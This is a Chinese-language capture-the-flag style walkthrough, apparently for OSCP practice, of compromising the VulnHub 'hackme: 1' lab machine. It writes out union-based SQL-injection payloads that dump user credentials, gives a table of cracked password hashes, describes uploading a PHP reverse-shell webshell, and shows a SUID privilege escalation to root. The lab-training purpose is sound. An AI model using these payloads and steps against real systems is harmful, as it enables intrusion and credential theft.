【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

admin 2024年3月5日18:38:19评论33 views字数 2437阅读8分7秒阅读模式
  • ---------------------------------------------------

  • 本文阅读时间推荐20min,靶场练习推荐3H

  • ---------------------------------------------------

如果各位童鞋想讨论以下相关内容,欢迎关注公众号, 联系我:
  • OSCP相关技术备考中
  • CISSP备考经验已通过认证
  • CCSK(云安全)已通过认证
  • ISO/IEC 27001 Foundation已通过认证
---------------------------------------------------

一、前言

主要利用方式:sql注入+文件上传+SUID权限执行

二、靶机信息

靶场: vulnhub.com靶机名称: HACKME: 1难度: 简单发布时间: 2019年 7月 18日下载地址:https://www.vulnhub.com/entry/hackme-1,330/备注:在考试的时候不允许用sqlmap,sql注入还是要多练习手工注入

三、虚拟机配置

Vmware、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配攻击IP:192.168.139.130靶机IP:192.168.139.132

四、信息收集

1、探测靶机ip地址

└─$ sudo arp-scan -I eth0 -l

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

2探测靶机ip端口及端口具体服务

└─$ sudo nmap -p- 10.0.2.10

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

└─$ sudo nmap -p22,80 -sV -A 10.0.2.10

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

3、常规访问80端口及路径扫描

└─$ dirsearch -u http://192.168.139.132

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

└─$ dirb http://192.168.139.132/  

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

从扫描得出,存在登录页面,上传页面

4、继续访问login页面及uploads页面

http://192.168.139.132/login.php

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

http://192.168.139.132/uploads/

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

五、漏洞利用(突破边界)

5、登录界面尝试弱口令和sql注入,皆尝试无果

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

7、发现存在注册界面,遂注册用户admin,提交

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

使用账号密码登录(admin/123456)

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

8、在搜索框中,无命令执行漏洞,但存在sql注入

通过1=1 及1=2 就能简单的判断出搜索框中存在字符型(单引号)sql注入

OSINT' and 1=1#

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

OSINT' and 1=2#

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

9、尝试通过sql注入,获取用户账号及密码

9.1:先使用order by快速判断存在多少列,通过判断,发现一共3列

search=OSINT' order by 3#

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

search=OSINT' order by 4#

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

9.2:使用union判断显示位置

search=OSINT' union select 1,2,3#

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

对比web页面

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

9.3:查看当前数据库位置

search=OSINT' union select database(),2,3#

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

9.4:查看数据库中存在的表

OSINT' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

9.5:查询user表的列

OSINT' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

9.6:查询所有用户名及密码

OSINT' union select group_concat(user),group_concat(pasword),3 from users#

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

https://www.somd5.com/

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

user

pasword

MD5明文

user1

5d41402abc4b2a76b9719d911017c592

hello

user2

6269c4f71a55b24bad0f0267d9be5508

commando

user3

0f359740bd1cda994f8b55330c86d845

p@ssw0rd

test

05a671c66aefea124cc08b76ea6d30bb

testtest

superadmin

2386acb2cf356944177746fc92523983

Uncrackable

test1

05a671c66aefea124cc08b76ea6d30bb

testtest

admin

e10adc3949ba59abbe56e057f20f883e

123456

10、尝试使用最复杂的用户名及密码登录(superadmin/Uncrackable

http://192.168.139.132/welcomeadmin.php

发现可以存在上传,正好印证了开头扫描出来的上传路径

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

11、设置好反弹shell的回连ip及端口,尝试上传,可以直接上传php的webshell

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

目录中发现rps.php 上传上来了

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

12、攻击机开启监听,再访问webshell文件

开启监听

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

访问webshell链接

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

发现成功反弹shell连接,并验证id权限,成功获取了www-data的权限

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

13、提升交互式tty

$ python -c "import pty;pty.spawn('/bin/bash')"

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

提权

14、全局搜索SUID权限程序

?>www-data@hackme: find / -perm -u=s -type f 2>/dev/null

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

15、进入对应的目录,并查看详情

www-data@hackme:/$ cd /home/legacy

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

16、执行touchmenot文件,验证权限,成功拿到root权限,并验证IP

www-data@hackme:/home/legacy$ ./touchmenot

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

root@hackme:/root# ip a

【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习


原文始发于微信公众号(从放弃到入门):【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月5日18:38:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP模拟-No.42】 hackme: 1靶机渗透测试练习https://cn-sec.com/archives/2547349.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息